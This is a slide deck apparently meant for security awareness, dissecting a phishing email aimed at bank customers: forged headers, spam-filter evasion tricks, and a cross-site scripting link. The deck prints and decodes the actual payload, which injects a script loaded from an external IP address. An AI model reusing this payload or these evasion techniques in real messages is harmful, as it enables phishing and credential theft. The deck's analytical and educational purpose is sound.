Date post: | 28-Nov-2014 |
Category: |
Documents |
Upload: | christopher-duffy |
View: | 804 times |
Download: | 3 times |
Deconstructing
A Phishing Scheme
Christopher Duffy, CISSP
Agenda• Definition• Examples• Breakdown• Follow Through• Statistics• Sites
Defined
"phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication.“
-Wikipedia
Catching a Phish
• Complete Attack • 1st effort to use clients as relay• Cross- Site Scripting Attack– email was not sent from the bank.– e web page it linked to contained extra characters in
the URL address line - added on to the bank’s legitimate web address
– page was hosted by the bank’s servers, overlaid it with altered elements to give the appearance of a legitimate “Account Verification” page.
Email Breakdown
• Header Info– Incorrect Return Address
Return-Path: [email protected] The return address is generated from the From: address
and applied by the final SMTP server to handle the message.
– Most scams forge the From: address. – This can be the only obfuscation a phisher employs; – forging From: headers is a trivial task, and is often a
feature of normal client mail user agents.
True Received: Header
• Received: from jeannedarc-2-82-67-84-75.fbx.proxad.net (82.67.84.75) – Received: headers are written in reverse; in this case, 82.67.84.75
is the last SMTP server to handle the message before the final destination. As such, it is the only trustworthy
– Received: information, and is in fact the true source of the message. 82.67.84.75 is a node in a French consumer ISP, and is likely a home PC previously compromised by the phisher
Forged Received: Header
• Received: from [email protected] ([82.67.84.75]) by [email protected] with Microsoft SMTPSVC(5.0.4416.5263)– This Received: line is forged. Some anti-spam software will trust the
Received: headers as a means of authenticating the source of the message, so adding extra Received:’s is an anti-spam evasion technique.
– Additional Evidence that this is a forgery is the fact that the IP address is identical to the address in the true Received: header. Also notice the presence of the “[email protected]” string in the fake server name; normal server names cannot have @-signs in their name.
– The names include the random dictionary words “harpsichord” and “poland” in an effort to evade Bayesian spam.
Incorrect Time Stamp
• Tue, 12 Nov 2008 07:12:03 -0100 – Timestamp Most Likely From a Comprimised PC• (Out of Sync Clock)
• Forged From: Name and Address– From: Suntrust Billing [email protected]
• the forged From: field is reflected in the Return-Path field
– Most Likely a True email within Suntrust
• Impersonal To: Name, if Any– To: Valued Suntrust Customer ,or– To:[email protected]– No Salutation
Threats
• Account Compromised• Suspension• Upgrades in the Name of Security
– Colorado Business Bank has registered our secure Web sites with VeriSign and use VeriSign Server IDs.VeriSign Server IDs enable you to verify the authenticity of our secure Web site and to communicate with our Web site securely via SSL (Secure Sockets Layer) encryption.
Proceed to customer service department>>
No RTF
• HTML-only messageContent-Type: text/html;– Delivered in HTML only, no RTF, or plain text.– Mail User Agent (MUA) Compatibility
What???
• Spurious Random Words
Content-Description: lonesome hysteria ulterior• Randomizer to avoid Bayesian Spam Filters
Hijacked
• Use of Trusted Logo’s & Images• Linked Directly to Site• Sense of Legitimacy
ESL• Phishing activity outside US= Non Native• Origination of Phishing & Spam– Countries Hosting Phishing Sites Q1 2008• Russia 11.66• China 10.3• Germany 5.64• Romania 5.09
XSS
• Cross Site Scripting Attacks– Cross site scripting (also known as XSS) occurs
when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it.
XSS Deconstruction<a title=3D"http://suntrust.com/" target=3D"_blank"
herf=3D"http://www.sun=trust.com/onlinestatements/index.asp?
AccountVerify=3Ddf4g653432fvfdsGFSg45=wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=3D%22%3E
%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a> to confirm you=r bank account records. <br>
• SCREEN TIP TARGET OBSFUCATION<a title=3D"http://suntrust.com/" target=3D"_blank“Mouse Over to distract from real target link
XSS Payload
• Link to True Siteherf=3D"http://www.sun=trust.com/onlinestatements/index.asp?
AccountVerify=3Ddf4g653432fvfdsGFSg45=Link target is Suntrust, following is XSS Payload (HEX)• wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo
=3D%22%3E%3Cscript+language=%3Djavascript+src%3D%22http%3A%2F%2F%3218%2E%3103%2E32%2E138%3A8=%3081%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E">click here</a>
HEX DeCoded
• Hex-encoded HTTP parameters string. Decoded, it reads "><SCRIPTlanguage=javascript src="http://218.103.23.138:8081/sun/sun.js"</SCRIPT>
• Link Executes sun.js• 218.103.23.138 Resolves to ISP in Hong Kong
Top Phishing
• Keyloggers & Maclious Code, up 93% from ’07• ISP’s• IRS
Mitigation Through Education
– Don’t click to Follow– Don’t trust Links– No Personal Information via email– Check out the URL– Let your Fingers Do the Walking
Type it In !
SecurityCartoon.com
More Information
• Internet Crime Centerwww.ic3.gov• Identity Theft: What to do if It Happens to Youhttp://www.privacyrights.org/fs/fs17a.htm• Federal Trade Commission phishing informationhttp://www.ftc.gov/bcp/conline/pubs/alerts/phishingalrt.htm• Video tutorial on phishing:http://www.pcsecuritysecrets.com/tips/media-chase_bank_fraud_and_phising.php• Microsoft Phishing Information Websitehttp://www.microsoft.com/protect/yourself/phishing/identify.mspx
• Anti-Phishing Non Profit Siteswww.antiphishing.org• www.apwg.com• www.bestsecuritytips.com• www.cyberstreet.org• Carnigie Mellon University Gamehttp://cups.cs.cmu.edu/antiphishing_phil/new/index.html